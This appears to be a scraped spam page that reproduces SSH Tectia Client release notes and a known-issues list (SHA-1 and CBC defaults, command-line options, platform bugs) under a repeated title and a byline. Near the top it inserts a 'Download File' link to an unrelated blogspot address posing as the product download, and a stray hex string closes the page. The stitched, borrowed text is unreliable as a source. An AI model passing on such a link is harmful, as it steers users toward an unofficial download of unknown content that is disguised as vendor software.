Ssh Tectia Client

[Maggie Schnair]

(TECT-721) Tectia Client now signs always with a SHA-2 algorithm in host-based authentication, and therefore it does not interoperate with old servers that have host-based authentication enabled as a user authentication method. It is recommended to upgrade both the client-side and server-side to the latest Tectia version if host-based authentication is used in the environment.

(TECT-591) Command-line clients sshg3, sftpg3 and scpg3 now support --template-profile option that can be used with a generic profile, specifying for example required algorithms, when connecting to servers instead of using default or server-specific profiles in ssh-broker-config.xml.

Ssh Tectia Client

Download File https://1dilicygyu.blogspot.com/?cinu=2wXnjm

(TECT-710) Command-line clients sshg3, sftpg3 and scpg3 now support --publickey-algs option that specify signature algorithms in preferred order in user publickey authentication. Alternatively, signature-algorithms can be specified in ssh-broker-config.xml.

(RQ #14227) Windows: If trying to connect from a Windows GUI client to an OpenSSH server with a public key and option command="ls", the client hangs. When performed with the Windows command-line client (sshg3) it works properly.

(TECT-606) User-defined password in connection profile is now only tried once. Previously an incorrect password in connection profile would make the client reattempt the connection until all attempts were exhausted.

(TECT-541) Due to vulnerabilities discovered in the SHA-1 hashing algorithm, SHA1 algorithms for signatures and key exchange have been removed from client defaults. These algorithms can still be enabled for legacy reasons for example in profile settings when connecting to a particular legacy server. For fallback configuration please see the Tectia Client example file ssh-broker-config-example.xml in the system-wide configuration directory. It is important to understand that SHA-1 algorithms are deprecated due to security issues and should not be enabled without a critical legacy dependency for them.

HMAC SHA1 algorithms still remain in client defaults. Although NIST has formally deprecated the use of SHA-1 for digital signatures, SHA-1 is still considered secure forHMAC as the security of HMAC does not rely on the underlying hash function being resistant to collisions.

CBC mode ciphers are no longer included in client defaults. Although there are no known vulnerabilities for current versions, there are better counter modes available such as GMC. CBC mode ciphers can still be manually enabled in the client configuration. This change was made to alleviate false positives in security audits. Our recommendation is to use CTR mode and GCM mode over CBC mode whenever possible and use CBC mode only when it is not possible to use the other two counter modes with ciphers.

----------------------

(TECT-511)

CTR mode ciphers aes128-ctr, aes192-ctr and aes256-ctr are preferred over CBC mode ciphers in client default values. Also 3des-cbc has been remove from defaults.

Due to vulnerabilities discovered in the SHA-1 hashing algorithm, SHA1 algorithms for signatures and key exchange shall be deprecated and removed from client defaults in future releases. SHA2 has already been preferred over SHA1 in client defaults since version 6.4.18.

In future releases:

ssh-dss (DSA/SHA1) will no longer be included in public-key signature algorithms nor host key algorithms default values. It is recommended to start using SHA2 variants (e.g. ssh-dss-sha256 ssh.com) for existing DSA keys and create additional RSA, ED25519, or ECDSA key(s) for better interoperability with third-party clients/servers.

(TECT-228)

- Tectia Client Configuration GUI now stores saved password in base64 encoded format using string-base64 attribute for non-interactive connections. Also passwords with special character " can be used. Public-key authentication or external password program is recommended instead of saved passwords.

(TECT-290)

- ssh-keygen-g3 --append=no option now correctly truncates saved public hostkey file so that shorter keys can be used to replace longer keys, for example an ECDSA key to replace a RSA key. Now subsequent alternate identities can be appended correctly.

(TECT-160)

- Windows: Tectia Client File Transfer GUI has now 'Filter bar' toolbar for local and remote file list to filter folders and files using a glob pattern, e.g. '*.txt' in current folder.

(TECT-219)

- RFC8308 server-sig-algs extension is now supported also on client-side. User public-key authentication is less likely to fail for example against OpenSSH server due to too many failed attempts when only signature algorithms that the server supports are attempted.

-----------------

The following issues are currently known to exist in Tectia Client:

(FB #38886)

- All Platforms: scpg3 and sftpg3 with --append overwrite the destination file when the server is OpenSSH 6.4 or older.

(FB# 39847)

- AIX: Host-based authentication in FIPS mode requires copying or linking the libcrypto.a to /lib or /usr/lib.

(FB #36224, FB #36221)

- Windows: Connections Configuration GUI: Dots do not work correctly in profile names or profile folder names, because they are used internally for the profile folder feature.

(FB #36222)

- Windows: Connections Configuration GUI: Empty connection profile folders are not saved in the Broker configuration.

(FB #36835)

- All platforms: Remote translation tables only work when the site command X=BIN is used. Local translation tables work as intended.

(FB #19541)

- Unix/Linux: When logged to the SSH Tectia Server, an executable will fail to start if any parent of the current working directory is not readable and relative paths are used to refer to the executable.

(FB #13818)

- All Platforms: The usage of IPv6 addresses in certificates is not yet supported.

(FB #3882)

- z/OS: SFTP fails when attempting to transfer an empty MVS dataset. However, FTP opens the file and proclaims that the transfer is completed without generating an error.

(FB #10425)

- Unix: if OpenSSL 0.9.8 is installed on the host where Tectia Server is installed, it may fail when using PAM with software that uses that OpenSSL library. Workaround if FIPS is not used: Rename the libcrypto.so.0.9.8 existent under /opt/tectia/sshlib to another name (note that this will make FIPS mode unusable).

(FB #9840)

- Solaris: On some Solaris configurations the ssh-capture tool does not function without configuring the operating system. The runtime linking environment must be adjusted to honor the LD_PRELOAD environment variable. See the manual page of crle(1) for details.

(FB #9367)

- Windows: If the installation fails with error message "An error occurred during the installation of assembly component B708EB72-AA82-3EB7-8BB0-D845BAB35C93D. HRESULT: 0x80070BC9" use Windows Update to install required operating system updates.

(FB #9106)

- AIX: Executables are now compiled in 64 bit. For PAM to work, the operating system should point to the 64-bit versions of PAM libraries instead of the 32-bit versions.

(FB #9530)

- All platforms: Extra checks are done when starting the Tectia Server and Connection Broker in the FIPS mode due to the OpenSSL FIPS cryptographic library health check. This will lead to a noticeable delay in the start of the process on slow machines.

(FB #7726)

- Windows: --summary-format newline option '\n' does not work on Windows.

(FB #4725)

- All platforms: The ssh-keygen will always use the default location of the UserConfigDirectory, if no path is specified.

(FB #4705)

- Linux SE: If the common package is installed with SElinux disabled, the following warning message will be given during the installation:

/usr/bin/chcon: can't apply partial context to unlabeled file

/opt/tectia/lib/shlib/libicudata.so.40

/usr/bin/chcon: can't apply partial context to unlabeled file

/opt/tectia/lib/shlib/libicuuc.so.40

This can be safely ignored. However, if the SElinux enforcing is enabled

after the installation, the following command needs to be executed:

/usr/bin/chcon -t textrel_shlib_t /opt/tectia/lib/shlib/*.so

(RQ #18958)

- Windows: Password cannot be specified in a file with --password command-line option.

(RQ #18674)

- Windows: Uploading files from "Upload Dialog" of the GUI file transfer tool does not work when "Hide extensions for known file types" of Windows Explorer is set to 'yes'. Workaround: Enable file extensions. This issue will be fixed in an upcoming maintenance release.

(RQ #17537)

- Windows: If the "Transparent tunneling" component of Tectia Client or Tectia ConnectSecure is installed on a Windows XP computer in a domain where firewall exceptions are managed by a group policy, the exceptions get changed so that the computer becomes inaccessible from the network. Workaround: Edit the exceptions manually so that, for example, the server port becomes accessible.

(RQ #17535)

- Windows: SFTP GUI might cause the existing local copy of a file to be partially overwritten in ASCII mode, when downloading of the file from the remote server fails due to missing file permissions.

(RQ #17528)

- All platforms: The scpg3 command shows the transfer time incorrectly if "--statistics=simple" is set.

(RQ #17482)

- All platforms: When trying to connect to a server that is not available (i.e. the server is not running), the error message returned by

sshg3 is "Unable to connect to Broker". It should return "Unable to connect to Server".

(RQ #17368)

- Windows: Reconnecting to the previously used Connection Profile by pressing Enter in the Tectia Terminal or File Transfer GUI may fail in

some cases. Workaround: Select the profile from the menu.

(RQ #17343)

- Windows: Removing a token while it is being read could in some cases result in a Tectia Connection Broker failure.

(RQ #17215)

- Windows: Opening multiple remote tunnels in a profile against OpenSSH servers can cause Tectia Connection Broker to fail.

(RQ #17055)

- Solaris: Installation packages do not detect the underlying Solaris architecture to prevent installation of the x86-64 packages on x86

architecture. The packages can be installed but they will not work.

(RQ #16986)

- Windows: SFTP 'chmod' command is not supported against Tectia Server running on Windows.

(RQ #16902)

- Unix: If scpg3 is used to copy a file to itself, the file will be truncated and the scpg3 command hangs.

(RQ #16573)

- Unix: The 'finger' command does not show the idle time correctly when logged in using SFTP.

(RQ #16276)

- Windows: When running sftpg3 in batch mode, the Connection Broker may log the Broker_channel_process_exit_failed messages with status "Operation failed". These are system internal events and do not indicate any failure in the file transfer operation.

(RQ #16270)

- Windows: The exit values for scpg3 do not match the values mentioned in the documentation in the following error situations: connection lost, interrupting a file transfer using CTRL+C, trying to copy to a directory, but the destination is not a directory. Nevertheless, in all these cases the return value is non-zero.

(RQ #15996)

- All platforms: scpg3 does not warn about the existence of directories when shell globbing is used, for example:

scpg3 "/tmp/testdir/*" user server:/tmp

0aad45d008